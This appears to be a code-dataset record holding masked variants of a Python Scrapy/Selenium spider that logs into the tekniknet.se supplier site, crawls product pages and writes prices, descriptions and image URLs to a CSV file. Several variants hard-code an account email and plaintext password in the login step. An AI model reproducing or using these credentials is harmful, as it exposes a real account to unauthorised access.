csv_article_number = article_number.text.split(' ')[-1].replace(',', '.')
except:
self.loggger.info('article number4 non-exist')
csv_article_number = ''
try:
pimages = offer.find_elements_by_xpath('.//img')
csv_image_url = []
for pimage in pimages:
image_url = pimage.get_attribute('src')
if image_url not in csv_image_url:
csv_image_url.append(image_url)
except:
self.loggger.info('image4 non-exist')
######################################### CSV File Writing #########################################
# if csv_article_number not in article_number_list:
                    if csv_image_url:
                        # Same fixed-width row as in the list3 loop above, with
                        # the list4 categories and product url.
                        padded_images = (csv_image_url + [' '] * 18)[:18]
                        row = (['NEW', csv_article_number,
                                list4_categories[m].split('/')[1],
                                list4_categories[m].split('/')[2],
                                list4_categories[m].split('/')[3],
                                csv_heading, csv_desc,
                                csv_price_new, csv_price_old]
                               + padded_images
                               + [' ', csv_stock, list4[m]])
                        file.write(','.join(row) + '\n')
# article_number_list.append(csv_article_number)
except Exception as e:
self.loggger.info(e)
self.loggger.info('error4')
file.close()
self.driver.close()
|
flexible
|
{
"blob_id": "237a93ff73cb98fd9d4006f14d3cadbdc09259a4",
"index": 9885,
"step-1": "<mask token>\n\n\nclass ProductSpider(scrapy.Spider):\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self):\n options = webdriver.ChromeOptions()\n options.add_argument('--start-maximized')\n self.driver = webdriver.Chrome(chrome_options=options)\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass ProductSpider(scrapy.Spider):\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self):\n options = webdriver.ChromeOptions()\n options.add_argument('--start-maximized')\n self.driver = webdriver.Chrome(chrome_options=options)\n\n def parse(self, response):\n fh = logging.FileHandler(log_output_file)\n fh.setLevel(logging.INFO)\n logging.getLogger('selenium.webdriver.remote.remote_connection'\n ).setLevel(logging.WARNING)\n logging.getLogger('urllib3.connectionpool').setLevel(logging.WARNING)\n logging.getLogger('selenium.webdriver.remote.remote_connection'\n ).addHandler(fh)\n logging.getLogger('urllib3.connectionpool').addHandler(fh)\n logging.getLogger().addHandler(fh)\n self.loggger = logging.getLogger()\n self.driver.get(response.url)\n list1 = []\n list2 = []\n list3 = []\n list4 = []\n list5 = []\n list3_categories = []\n list4_categories = []\n csv_categories1 = ''\n csv_heading = ''\n csv_stock = ''\n csv_price_new = ''\n csv_price_old = ''\n csv_desc = ''\n csv_article_number = ''\n csv_image_url = []\n old_product_url = []\n WebDriverWait(self.driver, 20).until(EC.presence_of_element_located\n ((By.ID, 'email')))\n username = self.driver.find_element_by_id('email')\n username.send_keys('info@themobilestore.se')\n username = self.driver.find_element_by_id('password')\n username.send_keys('order88')\n login = self.driver.find_element_by_class_name('button-confirm')\n login.click()\n time.sleep(5)\n fh, abs_path = mkstemp()\n with fdopen(fh, 'w') as new_file:\n with open('tekniknet.csv') as old_file:\n for line in old_file:\n new_file.write(line.replace('NEW', 'old'))\n remove('tekniknet.csv')\n move(abs_path, 'tekniknet.csv')\n with open('tekniknet.csv', 'r') as ins:\n for line in ins:\n old_product_url.append(line.split(',')[-1])\n file = open('tekniknet.csv', 'a', errors='replace')\n for wrapper1 in self.driver.find_elements_by_class_name('level-0'):\n child_wrapper1 = wrapper1.find_element_by_xpath('./a')\n link1 = child_wrapper1.get_attribute('href')\n list1.append(link1)\n self.loggger.info(\n '*************************************************')\n self.loggger.info(link1)\n for i in range(0, len(list1) - 4):\n self.driver.get(list1[i])\n try:\n WebDriverWait(self.driver, 20).until(EC.\n presence_of_element_located((By.CLASS_NAME, 'inner')))\n for wrapper2 in self.driver.find_elements_by_class_name('inner'\n ):\n try:\n sub2 = wrapper2.find_element_by_class_name('subLinks')\n child_wrapper2 = sub2.find_elements_by_xpath('.//a')\n for child2 in child_wrapper2:\n link2 = child2.get_attribute('href')\n list2.append(link2)\n self.loggger.info(\n '^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^'\n )\n self.loggger.info(link2)\n except Exception as e:\n self.loggger.info(e)\n self.loggger.info('error')\n except:\n try:\n WebDriverWait(self.driver, 20).until(EC.\n presence_of_element_located((By.ID,\n 'categorySubCategories')))\n subcategory = self.driver.find_element_by_id(\n 'categorySubCategories')\n wrapper2_1 = subcategory.find_elements_by_xpath('.//a')\n for child3 in wrapper2_1:\n link2_1 = child3.get_attribute('href')\n list5.append(link2_1)\n for n in range(0, len(list5)):\n self.driver.get(list5[n])\n WebDriverWait(self.driver, 20).until(EC.\n presence_of_element_located((By.ID,\n 'categorySubCategories')))\n subcategory = self.driver.find_element_by_id(\n 'categorySubCategories')\n wrapper2_1_1 = subcategory.find_elements_by_xpath(\n './/a')\n for child3_1 in wrapper2_1_1:\n if child3_1.text != 'Visa alla':\n link2_1_1 = 
child3_1.get_attribute('href')\n list2.append(link2_1_1)\n except:\n try:\n breadcrumbs2 = self.driver.find_element_by_id(\n 'breadcrumbs')\n categories2 = breadcrumbs2.find_elements_by_xpath(\n './/li')\n csv_categories2 = ''\n for category2 in categories2:\n csv_categories2 = (csv_categories2 + category2.\n text + '/')\n WebDriverWait(self.driver, 20).until(EC.\n presence_of_element_located((By.CLASS_NAME,\n 'listProduct')))\n for wrapper2_2 in self.driver.find_elements_by_class_name(\n 'listProduct'):\n wrapper2_3 = wrapper2_2.find_element_by_xpath(\n './/a')\n link2_2 = wrapper2_3.get_attribute('href')\n list4.append(link2_2)\n list4_categories.append(csv_categories2)\n self.loggger.info(\n '&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&'\n )\n self.loggger.info(link2_2)\n self.loggger.info('error')\n except Exception as e:\n self.loggger.info(e)\n self.loggger.info('error')\n for j in range(0, len(list2)):\n try:\n self.loggger.info('**********-------------- ' + str(j) +\n ' ******************************')\n self.driver.get(list2[j])\n WebDriverWait(self.driver, 30).until(EC.\n presence_of_element_located((By.ID, 'breadcrumbs')))\n breadcrumbs1 = self.driver.find_element_by_id('breadcrumbs')\n categories1 = breadcrumbs1.find_elements_by_xpath('.//li')\n csv_categories1 = ''\n for category1 in categories1:\n csv_categories1 = csv_categories1 + category1.text + '/'\n WebDriverWait(self.driver, 20).until(EC.\n presence_of_element_located((By.CLASS_NAME, 'listProduct'))\n )\n for wrapper3 in self.driver.find_elements_by_class_name(\n 'listProduct'):\n child_wrapper3 = wrapper3.find_element_by_xpath('.//a')\n link3 = child_wrapper3.get_attribute('href')\n list3.append(link3)\n list3_categories.append(csv_categories1)\n self.loggger.info(\n '&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&'\n )\n self.loggger.info(link3)\n except Exception as e:\n self.loggger.info(e)\n self.loggger.info('error')\n for k in range(0, len(list3)):\n try:\n if list3[k] not in old_product_url:\n self.loggger.info('----------------------- ' + str\n (k) + ' ******************************')\n self.driver.get(list3[k])\n WebDriverWait(self.driver, 30).until(EC.\n presence_of_element_located((By.ID, 'breadcrumbs')))\n offer = self.driver.find_element_by_id('productPageUpper')\n try:\n heading = offer.find_element_by_class_name('pHeader')\n csv_heading = heading.text.replace(',', '.')\n except:\n self.loggger.info('heading3 non-exist')\n csv_heading = ''\n try:\n stock = offer.find_element_by_class_name('instock')\n csv_stock = stock.text\n except:\n csv_stock = 'Out of stock'\n self.loggger.info('stock3 non-exist')\n csv_stock = ''\n try:\n price_new = offer.find_element_by_class_name(\n 'priceRegular')\n csv_price_new = price_new.text.split(' ')[0]\n except:\n try:\n price_new = offer.find_element_by_class_name(\n 'priceNew')\n csv_price_new = price_new.text.split(' ')[0]\n price_old = offer.find_element_by_class_name(\n 'priceOld')\n csv_price_old = price_old.text.split(' ')[0]\n except:\n self.loggger.info('price3 non-exist')\n csv_price_old = ''\n csv_price_new = ''\n try:\n desc = offer.find_element_by_id('pDesc')\n csv_desc = desc.get_attribute('innerHTML').replace(',',\n '-').replace('\\n', ' ').replace('\\r', '').rstrip(\n ).lstrip()\n except:\n self.loggger.info('description3 non-exist')\n csv_desc = ''\n try:\n article_number = offer.find_element_by_id(\n 'pManufacturer')\n csv_article_number = article_number.text.split(' ')[-1\n ].replace(',', '.')\n except:\n self.loggger.info('article 
number3 non-exist')\n csv_article_number = ''\n try:\n pimages = offer.find_elements_by_xpath('.//img')\n csv_image_url = []\n for pimage in pimages:\n image_url = pimage.get_attribute('src')\n if image_url not in csv_image_url:\n csv_image_url.append(image_url)\n except:\n self.loggger.info('image3 non-exist')\n if len(csv_image_url) == 1:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 2:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 3:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3\n [k] + '\\n')\n elif len(csv_image_url) == 4:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +\n ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 5:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 6:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n 
list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 7:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3\n [k] + '\\n')\n elif len(csv_image_url) == 8:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +\n ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 9:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 10:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 11:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + 
',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3\n [k] + '\\n')\n elif len(csv_image_url) == 12:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' +\n ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 13:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + ' ' + ',' + ' ' +\n ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' +\n ',' + csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 14:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + csv_image_url[\n 13] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3\n [k] + '\\n')\n elif len(csv_image_url) == 15:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + csv_image_url[\n 13] + ',' + csv_image_url[14] + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +\n ',' + list3[k] + '\\n')\n elif 
len(csv_image_url) == 16:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + csv_image_url[\n 13] + ',' + csv_image_url[14] + ',' +\n csv_image_url[15] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 17:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + csv_image_url[\n 13] + ',' + csv_image_url[14] + ',' +\n csv_image_url[15] + ',' + csv_image_url[16] +\n ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' +\n list3[k] + '\\n')\n elif len(csv_image_url) >= 18:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + csv_image_url[\n 13] + ',' + csv_image_url[14] + ',' +\n csv_image_url[15] + ',' + csv_image_url[16] +\n ',' + csv_image_url[17] + ',' + ' ' + ',' +\n csv_stock + ',' + list3[k] + '\\n')\n except Exception as e:\n self.loggger.info(e)\n self.loggger.info('error3')\n for m in range(0, len(list4)):\n try:\n if list4[m] not in old_product_url:\n self.loggger.info('********************** ' + str(\n k) + ' ******************************')\n self.driver.get(list4[m])\n WebDriverWait(self.driver, 30).until(EC.\n presence_of_element_located((By.ID, 'breadcrumbs')))\n offer = self.driver.find_element_by_id('productPageUpper')\n try:\n heading = offer.find_element_by_class_name('pHeader')\n csv_heading = heading.text.replace(',', '.')\n except:\n self.loggger.info('heading4 non-exist')\n csv_heading = ''\n try:\n stock = offer.find_element_by_class_name('instock')\n csv_stock = stock.text\n except:\n csv_stock = 'Out of stock'\n self.loggger.info('stock4 non-exist')\n try:\n price_new = offer.find_element_by_class_name(\n 'priceRegular')\n csv_price_new = price_new.text.split(' ')[0]\n except:\n try:\n price_new = offer.find_element_by_class_name(\n 'priceNew')\n csv_price_new = price_new.text.split(' ')[0]\n price_old = offer.find_element_by_class_name(\n 'priceOld')\n 
csv_price_old = price_old.text.split(' ')[0]\n
                        except:\n
                            self.loggger.info('price4 non-exist')\n
                            csv_price_new = ''\n
                            csv_price_old = ''\n
                    try:\n
                        desc = offer.find_element_by_id('pDesc')\n
                        csv_desc = desc.get_attribute('innerHTML').replace(',', '-').replace('\\n', ' ').replace('\\r', '').rstrip().lstrip()\n
                    except:\n
                        self.loggger.info('description4 non-exist')\n
                        csv_desc = ''\n
                    try:\n
                        article_number = offer.find_element_by_id('pManufacturer')\n
                        csv_article_number = article_number.text.split(' ')[-1].replace(',', '.')\n
                    except:\n
                        self.loggger.info('article number4 non-exist')\n
                        csv_article_number = ''\n
                    try:\n
                        pimages = offer.find_elements_by_xpath('.//img')\n
                        csv_image_url = []\n
                        for pimage in pimages:\n
                            image_url = pimage.get_attribute('src')\n
                            if image_url not in csv_image_url:\n
                                csv_image_url.append(image_url)\n
                    except:\n
                        self.loggger.info('image4 non-exist')\n
                    if csv_image_url:\n
                        # Pad the scraped image URLs out to the fixed\n
                        # 19-column layout instead of one elif per count.\n
                        image_cols = (csv_image_url[:18] + [' '] * 19)[:19]\n
                        row = ['NEW', csv_article_number,\n
                            list4_categories[m].split('/')[1],\n
                            list4_categories[m].split('/')[2],\n
                            list4_categories[m].split('/')[3],\n
                            csv_heading, csv_desc, csv_price_new,\n
                            csv_price_old] + image_cols + [csv_stock, list4[m]]\n
                        file.write(','.join(row) + '\\n')\n
            except Exception as e:\n
                self.loggger.info(e)\n
                self.loggger.info('error4')\n
        file.close()\n
        self.driver.close()\n",
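Most of the bulk in these step variants is the elif ladder over len(csv_image_url), one near-identical file.write per image count, repeated for both the list3 and list4 product loops. The branches differ only in how many blank image columns pad the row out to the fixed 19-column layout, so they collapse into a single helper. A minimal standalone sketch under that assumption (the helper name write_product_row is mine, not from the original code):

def write_product_row(out_file, categories, article_number, heading, desc,
                      price_new, price_old, image_urls, stock, product_url):
    # The original ladder writes nothing when no image URL was scraped.
    if not image_urls:
        return
    # At most 18 URLs are kept; the row always carries 19 image columns,
    # unused ones filled with a single space, matching the elif branches.
    image_cols = (image_urls[:18] + [' '] * 19)[:19]
    parts = categories.split('/')
    row = ['NEW', article_number, parts[1], parts[2], parts[3], heading,
           desc, price_new, price_old] + image_cols + [stock, product_url]
    out_file.write(','.join(row) + '\n')

Each branch of the ladder then becomes one call, e.g. write_product_row(file, list3_categories[k], csv_article_number, csv_heading, csv_desc, csv_price_new, csv_price_old, csv_image_url, csv_stock, list3[k]).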
"step-3": "<mask token>\noutput_timestamp = datetime.today().strftime('%Y-%m-%d-%H%M')\nlog_output_file = 'scrape-order-images-{}.log'.format(output_timestamp)\n\n\nclass ProductSpider(scrapy.Spider):\n name = 'tekniknet_new'\n allowed_domains = ['www.tekniknet.se']\n start_urls = ['https://www.tekniknet.se/#']\n\n def __init__(self):\n options = webdriver.ChromeOptions()\n options.add_argument('--start-maximized')\n self.driver = webdriver.Chrome(chrome_options=options)\n\n def parse(self, response):\n fh = logging.FileHandler(log_output_file)\n fh.setLevel(logging.INFO)\n logging.getLogger('selenium.webdriver.remote.remote_connection'\n ).setLevel(logging.WARNING)\n logging.getLogger('urllib3.connectionpool').setLevel(logging.WARNING)\n logging.getLogger('selenium.webdriver.remote.remote_connection'\n ).addHandler(fh)\n logging.getLogger('urllib3.connectionpool').addHandler(fh)\n logging.getLogger().addHandler(fh)\n self.loggger = logging.getLogger()\n self.driver.get(response.url)\n list1 = []\n list2 = []\n list3 = []\n list4 = []\n list5 = []\n list3_categories = []\n list4_categories = []\n csv_categories1 = ''\n csv_heading = ''\n csv_stock = ''\n csv_price_new = ''\n csv_price_old = ''\n csv_desc = ''\n csv_article_number = ''\n csv_image_url = []\n old_product_url = []\n WebDriverWait(self.driver, 20).until(EC.presence_of_element_located\n ((By.ID, 'email')))\n username = self.driver.find_element_by_id('email')\n username.send_keys('info@themobilestore.se')\n username = self.driver.find_element_by_id('password')\n username.send_keys('order88')\n login = self.driver.find_element_by_class_name('button-confirm')\n login.click()\n time.sleep(5)\n fh, abs_path = mkstemp()\n with fdopen(fh, 'w') as new_file:\n with open('tekniknet.csv') as old_file:\n for line in old_file:\n new_file.write(line.replace('NEW', 'old'))\n remove('tekniknet.csv')\n move(abs_path, 'tekniknet.csv')\n with open('tekniknet.csv', 'r') as ins:\n for line in ins:\n old_product_url.append(line.split(',')[-1])\n file = open('tekniknet.csv', 'a', errors='replace')\n for wrapper1 in self.driver.find_elements_by_class_name('level-0'):\n child_wrapper1 = wrapper1.find_element_by_xpath('./a')\n link1 = child_wrapper1.get_attribute('href')\n list1.append(link1)\n self.loggger.info(\n '*************************************************')\n self.loggger.info(link1)\n for i in range(0, len(list1) - 4):\n self.driver.get(list1[i])\n try:\n WebDriverWait(self.driver, 20).until(EC.\n presence_of_element_located((By.CLASS_NAME, 'inner')))\n for wrapper2 in self.driver.find_elements_by_class_name('inner'\n ):\n try:\n sub2 = wrapper2.find_element_by_class_name('subLinks')\n child_wrapper2 = sub2.find_elements_by_xpath('.//a')\n for child2 in child_wrapper2:\n link2 = child2.get_attribute('href')\n list2.append(link2)\n self.loggger.info(\n '^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^'\n )\n self.loggger.info(link2)\n except Exception as e:\n self.loggger.info(e)\n self.loggger.info('error')\n except:\n try:\n WebDriverWait(self.driver, 20).until(EC.\n presence_of_element_located((By.ID,\n 'categorySubCategories')))\n subcategory = self.driver.find_element_by_id(\n 'categorySubCategories')\n wrapper2_1 = subcategory.find_elements_by_xpath('.//a')\n for child3 in wrapper2_1:\n link2_1 = child3.get_attribute('href')\n 